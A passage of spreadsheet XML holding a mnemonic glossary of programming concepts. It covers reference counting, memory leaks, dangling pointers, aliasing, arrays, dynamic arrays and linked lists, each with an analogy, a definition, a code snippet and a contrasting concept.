      </c>
      <c r="F97" t="inlineStr">
        <is>
          <t>obj = Big() / obj = None # unreachable -&gt; collected eventually</t>
        </is>
      </c>
      <c r="G97" t="inlineStr">
        <is>
          <t>Reference counting - refcounting frees at zero instantly but leaks cycles; tracing GC handles cycles but must scan.</t>
        </is>
      </c>
      <c r="H97" t="inlineStr">
        <is>
          <t>Marking trees to keep before clearing the forest</t>
        </is>
      </c>
      <c r="J97" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K97" t="inlineStr">
        <is>
          <t>Memory model basics</t>
        </is>
      </c>
    </row>
    <row r="98">
      <c r="A98" t="n">
        <v>0</v>
      </c>
      <c r="B98" t="inlineStr">
        <is>
          <t>096</t>
        </is>
      </c>
      <c r="C98" t="inlineStr">
        <is>
          <t>Refcounting &amp; cycles</t>
        </is>
      </c>
      <c r="D98" t="inlineStr">
        <is>
          <t>Two shipwrecked sailors each gripping the other's life-rope: the rescue rule - 'haul out anyone no rope holds' - never fires, so the pair float in the ocean forever holding each other, until the cycle-cutter boat (gc) circles by with shears.</t>
        </is>
      </c>
      <c r="E98" t="inlineStr">
        <is>
          <t>Refcounting frees an object the instant its count hits zero, but mutual references never reach zero - CPython adds a cycle collector.</t>
        </is>
      </c>
      <c r="F98" t="inlineStr">
        <is>
          <t>a = {}; b = {"a": a}; a["b"] = b / del a, b # cycle: only gc reclaims it</t>
        </is>
      </c>
      <c r="G98" t="inlineStr">
        <is>
          <t>Tracing GC - tracing asks 'reachable from roots?' so cycles die naturally; refcounting only asks 'how many holders?'</t>
        </is>
      </c>
      <c r="H98" t="inlineStr">
        <is>
          <t>Two mirrors reflecting each other forever</t>
        </is>
      </c>
      <c r="J98" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K98" t="inlineStr">
        <is>
          <t>Memory model basics</t>
        </is>
      </c>
    </row>
    <row r="99">
      <c r="A99" t="n">
        <v>0</v>
      </c>
      <c r="B99" t="inlineStr">
        <is>
          <t>097</t>
        </is>
      </c>
      <c r="C99" t="inlineStr">
        <is>
          <t>Memory leak</t>
        </is>
      </c>
      <c r="D99" t="inlineStr">
        <is>
          <t>A bathtub whose drain is fouled by a growing hairball of forgotten keychains (a global cache holding everything it ever saw): the tap keeps running, nothing drains, and by evening the whole house's floor (RAM) is underwater.</t>
        </is>
      </c>
      <c r="E99" t="inlineStr">
        <is>
          <t>A leak is memory never reclaimed - lost pointers in C, or GC'd objects kept reachable by forgotten caches, listeners, and globals.</t>
        </is>
      </c>
      <c r="F99" t="inlineStr">
        <is>
          <t>cache = {} / def get(k): / cache[k] = load(k) # never evicted: leak</t>
        </is>
      </c>
      <c r="G99" t="inlineStr">
        <is>
          <t>Dangling pointer - a leak is memory held too long; a dangling pointer is memory used after it was freed.</t>
        </is>
      </c>
      <c r="H99" t="inlineStr">
        <is>
          <t>A hoarder's garage that no truck ever empties</t>
        </is>
      </c>
      <c r="J99" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K99" t="inlineStr">
        <is>
          <t>Memory model basics</t>
        </is>
      </c>
    </row>
    <row r="100">
      <c r="A100" t="n">
        <v>0</v>
      </c>
      <c r="B100" t="inlineStr">
        <is>
          <t>098</t>
        </is>
      </c>
      <c r="C100" t="inlineStr">
        <is>
          <t>Dangling pointer (use-after-free)</t>
        </is>
      </c>
      <c r="D100" t="inlineStr">
        <is>
          <t>You still carry the key to apartment 4B, but the tower was imploded and a bakery built on the lot - yet your key still turns something, and you're now icing a stranger's wedding cake believing it's your bathtub.</t>
        </is>
      </c>
      <c r="E100" t="inlineStr">
        <is>
          <t>A dangling pointer targets memory already freed; using it reads garbage, corrupts the allocator, or hands attackers a write primitive.</t>
        </is>
      </c>
      <c r="F100" t="inlineStr">
        <is>
          <t>C: int *p = malloc(4); / free(p); / *p = 7; // use-after-free</t>
        </is>
      </c>
      <c r="G100" t="inlineStr">
        <is>
          <t>Null pointer - null crashes predictably at dereference; a dangling pointer 'works' on garbage and fails far from the bug.</t>
        </is>
      </c>
      <c r="H100" t="inlineStr">
        <is>
          <t>Mailing letters to your demolished childhood home</t>
        </is>
      </c>
      <c r="J100" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K100" t="inlineStr">
        <is>
          <t>Memory model basics</t>
        </is>
      </c>
    </row>
    <row r="101">
      <c r="A101" t="n">
        <v>0</v>
      </c>
      <c r="B101" t="inlineStr">
        <is>
          <t>099</t>
        </is>
      </c>
      <c r="C101" t="inlineStr">
        <is>
          <t>Aliasing</t>
        </is>
      </c>
      <c r="D101" t="inlineStr">
        <is>
          <t>One actor working two shows under two stage names: shave 'Bob' bald for the matinee and 'Robert' walks on stage bald that evening - only hiring a body double (copy) gets you two heads of hair.</t>
        </is>
      </c>
      <c r="E101" t="inlineStr">
        <is>
          <t>Aliasing is two names bound to one object, so mutation through either shows through both; b = a copies nothing - use copy() to fork.</t>
        </is>
      </c>
      <c r="F101" t="inlineStr">
        <is>
          <t>a = [1]; b = a / b.append(2) # a -&gt; [1, 2] / c = a.copy() # independent</t>
        </is>
      </c>
      <c r="G101" t="inlineStr">
        <is>
          <t>Shallow vs deep copy - a.copy() forks the outer list but inner objects stay aliased; deepcopy forks every level.</t>
        </is>
      </c>
      <c r="H101" t="inlineStr">
        <is>
          <t>One bank account with two debit cards</t>
        </is>
      </c>
      <c r="J101" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K101" t="inlineStr">
        <is>
          <t>Memory model basics</t>
        </is>
      </c>
    </row>
    <row r="102">
      <c r="A102" t="n">
        <v>0</v>
      </c>
      <c r="B102" t="inlineStr">
        <is>
          <t>100</t>
        </is>
      </c>
      <c r="C102" t="inlineStr">
        <is>
          <t>Array</t>
        </is>
      </c>
      <c r="D102" t="inlineStr">
        <is>
          <t>An egg carton nailed flat to a shelf: twelve identical cells touching side by side, each cell with a number painted on it.</t>
        </is>
      </c>
      <c r="E102" t="inlineStr">
        <is>
          <t>A fixed-size sequence of elements stored contiguously in memory, each slot the same size and directly addressable by index.</t>
        </is>
      </c>
      <c r="F102" t="inlineStr">
        <is>
          <t>a = [10, 20, 30] / a[1] # 20, direct slot access</t>
        </is>
      </c>
      <c r="G102" t="inlineStr">
        <is>
          <t>Linked list - array elements are physically adjacent in memory; list nodes are scattered and connected by pointers.</t>
        </is>
      </c>
      <c r="H102" t="inlineStr">
        <is>
          <t>Train cars coupled in a line (rejected: couplings suggest pointers, not contiguity).</t>
        </is>
      </c>
      <c r="J102" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K102" t="inlineStr">
        <is>
          <t>Arrays &amp; dynamic arrays</t>
        </is>
      </c>
    </row>
    <row r="103">
      <c r="A103" t="n">
        <v>0</v>
      </c>
      <c r="B103" t="inlineStr">
        <is>
          <t>101</t>
        </is>
      </c>
      <c r="C103" t="inlineStr">
        <is>
          <t>O(1) index arithmetic</t>
        </is>
      </c>
      <c r="D103" t="inlineStr">
        <is>
          <t>You whisper 'base plus five times eight' and teleport straight to locker 5 - no walking past lockers 0 through 4.</t>
        </is>
      </c>
      <c r="E103" t="inlineStr">
        <is>
          <t>Element i lives at base_address + i * element_size, so any index is reached in one arithmetic step regardless of array length.</t>
        </is>
      </c>
      <c r="F103" t="inlineStr">
        <is>
          <t>addr = base + i * 8 / x = a[500000] # same speed as a[0]</t>
        </is>
      </c>
      <c r="G103" t="inlineStr">
        <is>
          <t>Linked list traversal - indexing an array is one multiplication; reaching list node i takes i pointer hops.</t>
        </is>
      </c>
      <c r="H103" t="inlineStr">
        <is>
          <t>GPS coordinates for shelves (rejected: too abstract, no arithmetic feel).</t>
        </is>
      </c>
      <c r="J103" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K103" t="inlineStr">
        <is>
          <t>Arrays &amp; dynamic arrays</t>
        </is>
      </c>
    </row>
    <row r="104">
      <c r="A104" t="n">
        <v>0</v>
      </c>
      <c r="B104" t="inlineStr">
        <is>
          <t>102</t>
        </is>
      </c>
      <c r="C104" t="inlineStr">
        <is>
          <t>Dynamic array</t>
        </is>
      </c>
      <c r="D104" t="inlineStr">
        <is>
          <t>A hermit crab: when its shell (capacity) gets tight, it finds a bigger shell, hauls every belonging over, and abandons the old one.</t>
        </is>
      </c>
      <c r="E104" t="inlineStr">
        <is>
          <t>An array wrapper tracking size and capacity that allocates a bigger block when full - a resizable list on contiguous storage.</t>
        </is>
      </c>
      <c r="F104" t="inlineStr">
        <is>
          <t>lst = [] / for i in range(1000): lst.append(i) # grows itself</t>
        </is>
      </c>
      <c r="G104" t="inlineStr">
        <is>
          <t>Static array - a dynamic array reallocates and copies to grow; a static array's size is fixed at creation.</t>
        </is>
      </c>
      <c r="H104" t="inlineStr">
        <is>
          <t>Expanding suitcase (rejected: suitcases stretch in place; dynamic arrays move house).</t>
        </is>
      </c>
      <c r="J104" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K104" t="inlineStr">
        <is>
          <t>Arrays &amp; dynamic arrays</t>
        </is>
      </c>
    </row>
    <row r="105">
      <c r="A105" t="n">
        <v>0</v>
      </c>
      <c r="B105" t="inlineStr">
        <is>
          <t>103</t>
        </is>
      </c>
      <c r="C105" t="inlineStr">
        <is>
          <t>Geometric growth factor</t>
        </is>
      </c>
      <c r="D105" t="inlineStr">
        <is>
          <t>A bakery that doubles its oven every time it sells out: 8 loaves, 16, 32 - soon oven upgrades almost never happen.</t>
        </is>
      </c>
      <c r="E105" t="inlineStr">
        <is>
          <t>When full, capacity is multiplied by a constant (~1.5-2x), making reallocations exponentially rarer as the array grows.</t>
        </is>
      </c>
      <c r="F105" t="inlineStr">
        <is>
          <t>capacity: 4 -&gt; 8 -&gt; 16 -&gt; 32 / # C++ vector ~2x, CPython list ~1.125x</t>
        </is>
      </c>
      <c r="G105" t="inlineStr">
        <is>
          <t>Fixed-increment growth (+k slots) - that costs O(n^2) total copying; multiplying keeps total copy work O(n).</t>
        </is>
      </c>
      <c r="H105" t="inlineStr">
        <is>
          <t>Rabbit population doubling (rejected: rabbits multiply contents, not the container).</t>
        </is>
      </c>
      <c r="J105" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K105" t="inlineStr">
        <is>
          <t>Arrays &amp; dynamic arrays</t>
        </is>
      </c>
    </row>
    <row r="106">
      <c r="A106" t="n">
        <v>0</v>
      </c>
      <c r="B106" t="inlineStr">
        <is>
          <t>104</t>
        </is>
      </c>
      <c r="C106" t="inlineStr">
        <is>
          <t>Amortized O(1) append</t>
        </is>
      </c>
      <c r="D106" t="inlineStr">
        <is>
          <t>A mortgage: one huge house price paid off in tiny monthly installments - each append pays a small installment toward the rare big copy.</t>
        </is>
      </c>
      <c r="E106" t="inlineStr">
        <is>
          <t>Occasional O(n) resize copies are spread across the many cheap appends before them, averaging to constant time per append.</t>
        </is>
      </c>
      <c r="F106" t="inlineStr">
        <is>
          <t>lst.append(x) # usually O(1) / # rare resize copies all n; prior appends prepaid it</t>
        </is>
      </c>
      <c r="G106" t="inlineStr">
        <is>
          <t>Worst-case O(1) - amortized permits single expensive operations as long as any sequence averages out constant.</t>
        </is>
      </c>
      <c r="H106" t="inlineStr">
        <is>
          <t>Toll road free for 99 days, then one big fee on day 100.</t>
        </is>
      </c>
      <c r="J106" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K106" t="inlineStr">
        <is>
          <t>Arrays &amp; dynamic arrays</t>
        </is>
      </c>
    </row>
    <row r="107">
      <c r="A107" t="n">
        <v>0</v>
      </c>
      <c r="B107" t="inlineStr">
        <is>
          <t>105</t>
        </is>
      </c>
      <c r="C107" t="inlineStr">
        <is>
          <t>Insert/delete shift cost</t>
        </is>
      </c>
      <c r="D107" t="inlineStr">
        <is>
          <t>Squeezing into the middle of a packed movie-theater row: every single person to your right must stand up and shuffle one seat over.</t>
        </is>
      </c>
      <c r="E107" t="inlineStr">
        <is>
          <t>Inserting or removing at position i must shift every later element one slot, costing O(n - i), i.e. O(n) in general.</t>
        </is>
      </c>
      <c r="F107" t="inlineStr">
        <is>
          <t>lst.insert(0, x) # shifts every element right / lst.pop(0) # shifts every element left</t>
        </is>
      </c>
      <c r="G107" t="inlineStr">
        <is>
          <t>Linked list insert - with a node reference in hand a list splices in O(1); an array must physically shift neighbors.</t>
        </is>
      </c>
      <c r="H107" t="inlineStr">
        <is>
          <t>Shoving a book into a full shelf (rejected: shelves flex, arrays don't).</t>
        </is>
      </c>
      <c r="J107" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K107" t="inlineStr">
        <is>
          <t>Arrays &amp; dynamic arrays</t>
        </is>
      </c>
    </row>
    <row r="108">
      <c r="A108" t="n">
        <v>0</v>
      </c>
      <c r="B108" t="inlineStr">
        <is>
          <t>106</t>
        </is>
      </c>
      <c r="C108" t="inlineStr">
        <is>
          <t>Slice vs view</t>
        </is>
      </c>
      <c r="D108" t="inlineStr">
        <is>
          <t>The baker's counter: a Python slice is a cut slab you take home; a NumPy slice is a window in the bakery glass - poke it and the original loaf dents.</t>
        </is>
      </c>
      <c r="E108" t="inlineStr">
        <is>
          <t>start:stop:step selects a subrange; Python list slicing copies it, while NumPy/Go slices are views sharing the underlying buffer.</t>
        </is>
      </c>
      <c r="F108" t="inlineStr">
        <is>
          <t>b = a[2:5] # Python: independent copy / v = np_arr[2:5]; v[0] = 9 # NumPy view mutates original</t>
        </is>
      </c>
      <c r="G108" t="inlineStr">
        <is>
          <t>Copy vs view - a view aliases the same memory so writes leak through; a slice copy is fully independent.</t>
        </is>
      </c>
      <c r="H108" t="inlineStr">
        <is>
          <t>Pizza slice (rejected: generic, carries no copy-vs-alias story).</t>
        </is>
      </c>
      <c r="J108" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K108" t="inlineStr">
        <is>
          <t>Arrays &amp; dynamic arrays</t>
        </is>
      </c>
    </row>
    <row r="109">
      <c r="A109" t="n">
        <v>0</v>
      </c>
      <c r="B109" t="inlineStr">
        <is>
          <t>107</t>
        </is>
      </c>
      <c r="C109" t="inlineStr">
        <is>
          <t>Row-major layout</t>
        </is>
      </c>
      <c r="D109" t="inlineStr">
        <is>
          <t>Reading a book: you finish an entire line before dropping to the next - each row's words lie side by side on the page. (Fortran reads totem poles: column-major.)</t>
        </is>
      </c>
      <c r="E109" t="inlineStr">
        <is>
          <t>2D arrays flatten row after row: element (r,c) sits at index r * ncols + c, so sweeping along a row is cache-friendly.</t>
        </is>
      </c>
      <c r="F109" t="inlineStr">
        <is>
          <t>flat = r * ncols + c / # fast loop order: for r: for c: a[r][c]</t>
        </is>
      </c>
      <c r="G109" t="inlineStr">
        <is>
          <t>Column-major (Fortran, MATLAB) - there columns are contiguous and (r,c) maps to c * nrows + r.</t>
        </is>
      </c>
      <c r="H109" t="inlineStr">
        <is>
          <t>Typewriter carriage return (rejected: encodes the sweep, not the memory math).</t>
        </is>
      </c>
      <c r="J109" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K109" t="inlineStr">
        <is>
          <t>Arrays &amp; dynamic arrays</t>
        </is>
      </c>
    </row>
    <row r="110">
      <c r="A110" t="n">
        <v>0</v>
      </c>
      <c r="B110" t="inlineStr">
        <is>
          <t>108</t>
        </is>
      </c>
      <c r="C110" t="inlineStr">
        <is>
          <t>Capacity vs length</t>
        </is>
      </c>
      <c r="D110" t="inlineStr">
        <is>
          <t>An egg carton with 12 cups (capacity) holding 7 eggs (length): five more eggs fit before you must buy a bigger carton.</t>
        </is>
      </c>
      <c r="E110" t="inlineStr">
        <is>
          <t>Length counts stored elements; capacity counts allocated slots - appends stay cheap until length reaches capacity and triggers a resize.</t>
        </is>
      </c>
      <c r="F110" t="inlineStr">
        <is>
          <t>s := make([]int, 3, 10) // Go: len=3 cap=10 / s = append(s, 1) // no realloc until cap hit</t>
        </is>
      </c>
      <c r="G110" t="inlineStr">
        <is>
          <t>Reserve vs resize - reserve grows capacity only; resize changes length, actually creating or destroying elements.</t>
        </is>
      </c>
      <c r="H110" t="inlineStr">
        <is>
          <t>Restaurant tables set vs guests seated.</t>
        </is>
      </c>
      <c r="J110" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K110" t="inlineStr">
        <is>
          <t>Arrays &amp; dynamic arrays</t>
        </is>
      </c>
    </row>
    <row r="111">
      <c r="A111" t="n">
        <v>0</v>
      </c>
      <c r="B111" t="inlineStr">
        <is>
          <t>109</t>
        </is>
      </c>
      <c r="C111" t="inlineStr">
        <is>
          <t>Preallocation (reserve)</t>
        </is>
      </c>
      <c r="D111" t="inlineStr">
        <is>
          <t>Booking the whole banquet hall before guests trickle in, instead of bolting on a new dining room every time ten more arrive.</t>
        </is>
      </c>
      <c r="E111" t="inlineStr">
        <is>
          <t>Requesting the expected capacity up front eliminates repeated grow-and-copy cycles when the final size is known in advance.</t>
        </is>
      </c>
      <c r="F111" t="inlineStr">
        <is>
          <t>buf = [0] * n # preallocate n slots / v.reserve(n) # C++ vector</t>
        </is>
      </c>
      <c r="G111" t="inlineStr">
        <is>
          <t>Amortized growth - amortization makes unplanned resizes cheap on average; reserve removes them entirely when n is known.</t>
        </is>
      </c>
      <c r="H111" t="inlineStr">
        <is>
          <t>Buying the jumbo suitcase before the trip.</t>
        </is>
      </c>
      <c r="J111" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K111" t="inlineStr">
        <is>
          <t>Arrays &amp; dynamic arrays</t>
        </is>
      </c>
    </row>
    <row r="112">
      <c r="A112" t="n">
        <v>0</v>
      </c>
      <c r="B112" t="inlineStr">
        <is>
          <t>110</t>
        </is>
      </c>
      <c r="C112" t="inlineStr">
        <is>
          <t>Linked list</t>
        </is>
      </c>
      <c r="D112" t="inlineStr">
        <is>
          <t>A scavenger hunt: each clue (node) holds a prize plus directions to the next clue's hiding spot - lose one clue and the rest of the trail is gone forever.</t>
        </is>
      </c>
      <c r="E112" t="inlineStr">
        <is>
          <t>A chain of nodes, each holding a value plus a pointer to the next node; the whole structure is reached from a head reference.</t>
        </is>
      </c>
      <c r="F112" t="inlineStr">
        <is>
          <t>class Node: / def __init__(self, v): self.val, self.next = v, None / head = Node(1); head.next = Node(2)</t>
        </is>
      </c>
      <c r="G112" t="inlineStr">
        <is>
          <t>Array - an array is one contiguous block indexed by arithmetic; a list is scattered nodes reached by following pointers.</t>
        </is>
      </c>
      <c r="H112" t="inlineStr">
        <is>
          <t>Chain links (rejected: chains carry no payload and no direction).</t>
        </is>
      </c>
      <c r="J112" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K112" t="inlineStr">
        <is>
          <t>Linked lists</t>
        </is>
      </c>
    </row>
    <row r="113">
      <c r="A113" t="n">
        <v>0</v>
      </c>
      <c r="B113" t="inlineStr">
        <is>
          <t>111</t>
        </is>
      </c>
      <c r="C113" t="inlineStr">
        <is>
          <t>Singly vs doubly linked</t>
        </is>
      </c>
      <c r="D113" t="inlineStr">
        <is>
          <t>Train cars coupled at both ends: from any car you can walk toward engine or caboose, and uncoupling one car just re-hooks its two neighbors.</t>
        </is>
      </c>
      <c r="E113" t="inlineStr">
        <is>
          <t>Doubly linked nodes carry prev and next pointers, buying backward traversal and O(1) removal of a known node for extra memory per node.</t>
        </is>
      </c>
      <c r="F113" t="inlineStr">
        <is>
          <t>node.prev.next = node.next # O(1) unlink / node.next.prev = node.prev</t>
        </is>
      </c>
      <c r="G113" t="inlineStr">
        <is>
          <t>Singly linked deletion - deleting a known singly node needs an O(n) walk to find its predecessor; doubly carries prev with it.</t>
        </is>
      </c>
      <c r="H113" t="inlineStr">
        <is>
          <t>Two-way street vs one-way street signs.</t>
        </is>
      </c>
      <c r="J113" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K113" t="inlineStr">
        <is>
          <t>Linked lists</t>
        </is>
      </c>
    </row>
    <row r="114">
      <c r="A114" t="n">
        <v>0</v>
      </c>
      <c r="B114" t="inlineStr">
        <is>
          <t>112</t>
        </is>
      </c>
      <c r="C114" t="inlineStr">
        <is>
          <t>O(1) head insert/delete</t>
        </is>
      </c>
      <c r="D114" t="inlineStr">
        <is>
          <t>Cutting to the front of a conga line: grab the leader's shoulders and you are the new head - the thousand dancers behind never move their feet.</t>
        </is>
      </c>
      <c r="E114" t="inlineStr">
        <is>
          <t>Prepending or removing at the head rewires only the head pointer and one node link - constant time however long the list is.</t>
        </is>
      </c>
      <c r="F114" t="inlineStr">
        <is>
          <t>new = Node(v) / new.next = head / head = new</t>
        </is>
      </c>
      <c r="G114" t="inlineStr">
        <is>
          <t>Array prepend - lst.insert(0, x) shifts every element; a list head insert touches exactly two pointers.</t>
        </is>
      </c>
      <c r="H114" t="inlineStr">
        <is>
          <t>Hooking a new engine onto the train.</t>
        </is>
      </c>
      <c r="J114" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K114" t="inlineStr">
        <is>
          <t>Linked lists</t>
        </is>
      </c>
    </row>
    <row r="115">
      <c r="A115" t="n">
        <v>0</v>
      </c>
      <c r="B115" t="inlineStr">
        <is>
          <t>113</t>
        </is>
      </c>
      <c r="C115" t="inlineStr">
        <is>
          <t>Sequential access O(n)</t>
        </is>
      </c>
      <c r="D115" t="inlineStr">
        <is>
          <t>A cave system with no map: to reach the fifth chamber you must crawl through chambers one, two, three, and four - teleporting is impossible.</t>
        </is>
      </c>
      <c r="E115" t="inlineStr">
        <is>
          <t>No index arithmetic exists: reaching item i means hopping node to node from the head, costing O(i) - the price paid for cheap splicing.</t>
        </is>
      </c>
      <c r="F115" t="inlineStr">
        <is>
          <t>cur = head / for _ in range(i): cur = cur.next</t>
        </is>
      </c>
      <c r="G115" t="inlineStr">
        <is>
          <t>Array indexing - a[i] is one address computation; list access to position i is i pointer dereferences.</t>
        </is>
      </c>
      <c r="H115" t="inlineStr">
        <is>
          <t>Following breadcrumbs one by one (rejected: breadcrumbs imply a return trail).</t>
        </is>
      </c>
      <c r="J115" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K115" t="inlineStr">
        <is>
          <t>Linked lists</t>
        </is>
      </c>
    </row>
    <row r="116">
      <c r="A116" t="n">
        <v>0</v>
      </c>
      <c r="B116" t="inlineStr">
        <is>
          <t>114</t>
        </is>
      </c>
      <c r="C116" t="inlineStr">
        <is>
          <t>Sentinel (dummy) node</t>
        </is>
      </c>
      <c r="D116" t="inlineStr">
        <is>
          <t>A palace guard (sentinel) who stands at the gate even when the palace is empty - every visitor is announced by someone, so 'is anyone home?' checks vanish.</t>
        </is>
      </c>
      <c r="E116" t="inlineStr">
        <is>
          <t>A permanent dummy node before the real head (or after the tail) so insert and delete code never special-cases empty lists or first elements.</t>
        </is>
      </c>
      <c r="F116" t="inlineStr">
        <is>
          <t>dummy = Node(0); dummy.next = head / prev = dummy # deletion loop never asks 'is this the head?' / return dummy.next</t>
        </is>
      </c>
      <c r="G116" t="inlineStr">
        <is>
          <t>Head pointer - the head references the first real node; a sentinel is a fake node holding that pointer, erasing edge cases.</t>
        </is>
      </c>
      <c r="H116" t="inlineStr">
        <is>
          <t>Mannequin placeholder in a shop window.</t>
        </is>
      </c>
      <c r="J116" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K116" t="inlineStr">
        <is>
          <t>Linked lists</t>
        </is>
      </c>
    </row>
    <row r="117">
      <c r="A117" t="n">
        <v>0</v>
      </c>
      <c r="B117" t="inlineStr">
        <is>
          <t>115</t>
        </is>
      </c>
      <c r="C117" t="inlineStr">
        <is>
          <t>Runner (fast-slow) technique</t>
        </is>
      </c>
      <c r="D117" t="inlineStr">
        <is>
          <t>A hare and a jogger leave the trailhead together; the hare runs twice as fast, so the instant it touches the finish line, the jogger is at the halfway bench.</t>
        </is>
      </c>
      <c r="E117" t="inlineStr">
        <is>
          <t>Two pointers advance at different speeds (fast 2 steps, slow 1); when fast reaches the end, slow stands exactly at the middle.</t>
        </is>
      </c>
      <c r="F117" t="inlineStr">
        <is>
          <t>slow = fast = head / while fast and fast.next: / slow, fast = slow.next, fast.next.next # slow = middle</t>
        </is>
      </c>
      <c r="G117" t="inlineStr">
        <is>
          <t>Floyd cycle detection - same two speeds, but Floyd watches for the pointers meeting; the runner watches where slow is when fast finishes.</t>
        </is>
      </c>
      <c r="H117" t="inlineStr">
        <is>
          <t>Escalator racer vs stair climber.</t>
        </is>
      </c>
      <c r="J117" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K117" t="inlineStr">
        <is>
          <t>Linked lists</t>
        </is>
      </c>
    </row>
    <row r="118">
      <c r="A118" t="n">
        <v>0</v>
      </c>
      <c r="B118" t="inlineStr">
        <is>
          <t>116</t>
        </is>
      </c>
      <c r="C118" t="inlineStr">
        <is>
          <t>Floyd cycle detection</t>
        </is>
      </c>
      <c r="D118" t="inlineStr">
        <is>
          <t>Tortoise and hare on a circular racetrack: on a loop the hare must eventually lap and collide with the tortoise; on a straight road the hare just vanishes over the horizon.</t>
        </is>
      </c>
      <c r="E118" t="inlineStr">
        <is>
          <t>If a fast pointer (2 steps) and slow pointer (1 step) ever land on the same node, the list has a cycle; on a straight list fast hits null first.</t>
        </is>
      </c>
      <c r="F118" t="inlineStr">
        <is>
          <t>while fast and fast.next: / slow, fast = slow.next, fast.next.next / if slow is fast: return True</t>
        </is>
      </c>
      <c r="G118" t="inlineStr">
        <is>
          <t>Visited-set detection - a hash set also finds cycles but costs O(n) memory; Floyd uses two pointers and O(1) space.</t>
        </is>
      </c>
      <c r="H118" t="inlineStr">
        <is>
          <t>Minute hand lapping the hour hand.</t>
        </is>
      </c>
      <c r="J118" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K118" t="inlineStr">
        <is>
          <t>Linked lists</t>
        </is>
      </c>
    </row>
    <row r="119">
      <c r="A119" t="n">
        <v>0</v>
      </c>
      <c r="B119" t="inlineStr">
        <is>
          <t>117</t>
        </is>
      </c>
      <c r="C119" t="inlineStr">
        <is>
          <t>In-place list reversal</t>
        </is>
      </c>
      <c r="D119" t="inlineStr">
        <is>
          <t>Walking a hallway of one-way arrows, flipping each arrow to point back the way you came - memorize the next doorway before you flip, or you strand yourself.</t>
        </is>
      </c>
      <c r="E119" t="inlineStr">
        <is>
          <t>One pass repoints each node's next at its predecessor using three pointers (prev, cur, nxt); prev ends up as the new head.</t>
        </is>
      </c>
      <c r="F119" t="inlineStr">
        <is>
          <t>prev = None / while cur: cur.next, prev, cur = prev, cur, cur.next / head = prev</t>
        </is>
      </c>
      <c r="G119" t="inlineStr">
        <is>
          <t>Reversal via stack or array copy - also reverses but uses O(n) extra space; in-place rewires pointers with O(1).</t>
        </is>
      </c>
      <c r="H119" t="inlineStr">
        <is>
          <t>Tipping dominoes backward (rejected: dominoes fall once, no pointer save).</t>
        </is>
      </c>
      <c r="J119" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K119" t="inlineStr">
        <is>
          <t>Linked lists</t>
        </is>
      </c>
    </row>
    <row r="120">
      <c r="A120" t="n">
        <v>0</v>
      </c>
      <c r="B120" t="inlineStr">
        <is>
          <t>118</t>
        </is>
      </c>
      <c r="C120" t="inlineStr">
        <is>
          <t>Tail pointer</t>
        </is>
      </c>
      <c r="D120" t="inlineStr">
        <is>
          <t>A bookmark clipped to the last page of a giant ledger: new entries go straight where the bookmark sits, no flipping through ten thousand pages.</t>
        </is>
      </c>
      <c r="E120" t="inlineStr">
        <is>
          <t>Keeping a reference to the last node makes append O(1); without it, every append is an O(n) walk to find the end.</t>
        </is>
      </c>
      <c r="F120" t="inlineStr">
        <is>
          <t>tail.next = Node(v) / tail = tail.next</t>
        </is>
      </c>
      <c r="G120" t="inlineStr">
        <is>
          <t>Head pointer - head buys O(1) prepend, tail buys O(1) append; a linked-list queue wants both ends tracked.</t>
        </is>
      </c>
      <c r="H120" t="inlineStr">
        <is>
          <t>Radio link to the caboose.</t>
        </is>
      </c>
      <c r="J120" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K120" t="inlineStr">
        <is>
          <t>Linked lists</t>
        </is>
      </c>
    </row>
    <row r="121">
      <c r="A121" t="n">
        <v>0</v>
      </c>
      <c r="B121" t="inlineStr">
        <is>
          <t>119</t>
        </is>
      </c>
      <c r="C121" t="inlineStr">
        <is>
          <t>Circular linked list</t>
        </is>
      </c>
      <c r="D121" t="inlineStr">
        <is>
          <t>A carousel of horses nose-to-tail in a ring: there is no last horse - keep riding and you pass your starting horse again and again.</t>
        </is>
      </c>
      <c r="E121" t="inlineStr">
        <is>
          <t>The last node points back to the first, so traversal wraps around and any node can serve as a starting point - natural for round-robin.</t>
        </is>
      </c>
      <c r="F121" t="inlineStr">
        <is>
          <t>tail.next = head # close the ring / cur = cur.next # round-robin scheduler, forever</t>
        </is>
      </c>
      <c r="G121" t="inlineStr">
        <is>
          <t>Accidental cycle - a circular list is a deliberate ring through all nodes; a bug cycle loops back mid-list and breaks termination checks.</t>
        </is>
      </c>
      <c r="H121" t="inlineStr">
        <is>
          <t>Ouroboros snake eating its tail (rejected: overused emblem, weak mechanism).</t>
        </is>
      </c>
      <c r="J121" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K121" t="inlineStr">
        <is>
          <t>Linked lists</t>
        </is>
      </c>
    </row>
    <row r="122">
      <c r="A122" t="n">
        <v>0</v>
